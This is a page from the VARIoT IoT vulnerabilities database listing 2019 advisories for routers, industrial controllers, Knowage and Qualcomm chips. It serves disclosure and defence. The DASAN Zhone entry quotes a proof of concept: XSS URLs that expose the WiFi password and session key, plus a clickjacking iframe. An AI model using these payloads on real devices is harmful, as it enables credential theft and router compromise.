VARIoT IoT vulnerabilities database
| VAR-201909-1664 | No CVE | Information disclosure vulnerability in Ruijie's unified online behavior management and auditing system |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Ruijie Networks Co., Ltd. is a company that provides end-to-end solutions for users in various industries using new technologies such as cloud computing, SDN, mobile internet, big data, and the Internet of Things.
An information disclosure vulnerability exists in Ruijie's unified online behavior management and auditing system. Attackers can use this vulnerability to obtain sensitive information.
| VAR-201909-1437 | CVE-2019-10891 | D-link DIR-806 Device code injection vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered in D-Link DIR-806 devices. There is a command injection in function hnap_main, which calls system() without checking the parameter that can be controlled by user, and finally allows remote attackers to execute arbitrary shell commands with a special HTTP header. D-link DIR-806 The device contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-806 is a wireless router from Taiwan D-Link.
A code injection vulnerability exists in D-Link DIR-806
| VAR-201909-1438 | CVE-2019-10892 | D-link DIR-806 Device buffer error vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered in D-Link DIR-806 devices. There is a stack-based buffer overflow in function hnap_main at /htdocs/cgibin. The function will call sprintf without checking the length of strings in parameters given by HTTP header and can be controlled by users. And it finally leads to a stack-based buffer overflow via a special HTTP header. D-link DIR-806 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dlink DIR-806 is a wireless AC1200 dual-band router. An attacker could exploit this vulnerability to run Shellcode via a long HTTP header that starts with "SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/"
| VAR-201909-1556 | No CVE | ABB Panel Builder 600 has dll hijacking vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ABB Group is a global leader in power and automation technology, dedicated to providing solutions to customers in the industrial and power industries.
ABB Panel Builder 600 has a dll hijacking vulnerability. Attackers can use the vulnerability to load malicious dlls and execute malicious code
| VAR-201909-1498 | CVE-2019-12223 | Hanwah Techwin SRN-472s and SRN-x Device buffer error vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
An issue was discovered in NVR WebViewer on Hanwah Techwin SRN-472s 1.07_190502 devices, and other SRN-x devices before 2019-05-03. A system crash and reboot can be achieved by submitting a long username in excess of 117 characters. The username triggers a buffer overflow in the main process controlling operation of the DVR system, rendering services unavailable during the reboot operation. A repeated attack affects availability as long as the attacker has network access to the device. Hanwah Techwin SRN-472s and SRN-x The device contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Hanwah Techwin SRN-472s is a network video recorder produced by Hanwah Techwin in Korea. NVR WebViewer is a set of web-based surveillance video management system running in it. The NVR WebViewer in Hanwah Techwin SRN-472s version 1.07_190502 and other SRN series products (before 2019-05-03) has a buffer error vulnerability. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
| VAR-201909-0680 | CVE-2019-13361 | Smanos W100 Device permission vulnerability |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network. Smanos W100 The device contains a permission vulnerability.Information may be tampered with. Smanos W100 is a home security alarm device produced by Smanos company in the Netherlands. A security vulnerability exists in Smanos W100 version 1.0.0. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements
| VAR-201909-1544 | No CVE | Denial of service vulnerability exists in Siemens SIMATIC S7-300 PLC |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Siemens SIMATIC S7-300 is a modular universal controller of Siemens (Siemens) for the manufacturing industry.
A denial of service vulnerability exists in Siemens SIMATIC S7-300 PLC. The attacker can cause the HTTP service to refuse to respond by constructing special data packets
| VAR-201909-1542 | No CVE | Buffer Overflow Vulnerability in Zijinqiao Monitoring Configuration Software RealInfo |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
RealInfo is an industrial automation monitoring configuration software developed by PetroChina Daqing Zijinqiao Software Technology Company.
There is a buffer overflow vulnerability in the real-time configuration software of Zijinqiao RealInfo. An attacker can trigger a vulnerability through a special string, causing the program to crash
| VAR-201909-1016 | CVE-2019-14278 | Knowage Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
In Knowage through 6.1.1, an unauthenticated user can enumerated valid usernames via the ChangePwdServlet page. Knowage Contains an information disclosure vulnerability.Information may be obtained
| VAR-201909-0689 | CVE-2019-13188 | Knowage Vulnerabilities in access control |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
In Knowage through 6.1.1, an unauthenticated user can bypass access controls and access the entire application. Knowage Contains an access control vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state
| VAR-201909-0676 | CVE-2019-13349 | Knowage Vulnerabilities related to certificate and password management |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
In Knowage through 6.1.1, an authenticated user that accesses the users page will obtain all user password hashes. Knowage Contains vulnerabilities related to certificate and password management.Information may be obtained
| VAR-201909-0690 | CVE-2019-13190 | Knowage Authentication vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
In Knowage through 6.1.1, the sign up page does not invalidate a valid CAPTCHA token. This allows for CAPTCHA bypass in the signup page. Knowage Contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state
| VAR-201909-1467 | CVE-2019-10677 | DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
| VAR-201909-1428 | CVE-2019-10497 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Use after free issue occurs If another instance of open for voice_svc node has been called from application without closing the previous one. in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in Audio in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
| VAR-201909-1457 | CVE-2019-10506 | plural Snapdragon Vulnerability related to input validation in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
While processing QCA_NL80211_VENDOR_SUBCMD_AVOID_FREQUENCY vendor command, driver does not validate the data obtained from the user space which could be invalid and thus leads to an undesired behaviour in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MDM9206, MDM9607, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM630, SDM660, SDX24. plural Snapdragon The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. An input validation error vulnerability exists in WLAN in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data
| VAR-201909-1458 | CVE-2019-10507 | plural Snapdragon Product out-of-bounds vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Lack of check of extscan change results received from firmware can lead to an out of buffer read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 210/SD 212/SD 205, SD 425, SD 430, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in WLAN in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
| VAR-201909-1123 | CVE-2019-2284 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.4 CVSS V3: 7.0 Severity: HIGH |
Possible use-after-free issue due to a race condition while calling camera ioctl concurrently in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MSM8909W, QCS405, QCS605, Qualcomm 215, SD 425, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 845 / SD 850, SD 855, SDM439, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SD 712 is a central processing unit (CPU) product. SD 710 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in the Camera in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
| VAR-201909-0986 | CVE-2019-2333 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow due to improper validation of buffer size while IPA driver processing to perform read operation in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9607 and others are products of Qualcomm (Qualcomm). MDM9607 is a central processing unit (CPU) product. MDM9650 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in the IPA driver in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
| VAR-201909-0987 | CVE-2019-2341 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow when the audio buffer size provided by user is larger than the maximum allowable audio buffer size. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS405, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
| VAR-201909-0985 | CVE-2019-1976 | Cisco Industrial Network Director Vulnerabilities related to certificate and password management |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the “plug-and-play” services component of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper access restrictions on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to access running configuration information about devices managed by the IND, including administrative credentials. Cisco Industrial Network Director (IND) is an industrial automation management system from Cisco. The system is automated through the visualization of industrial Ethernet infrastructure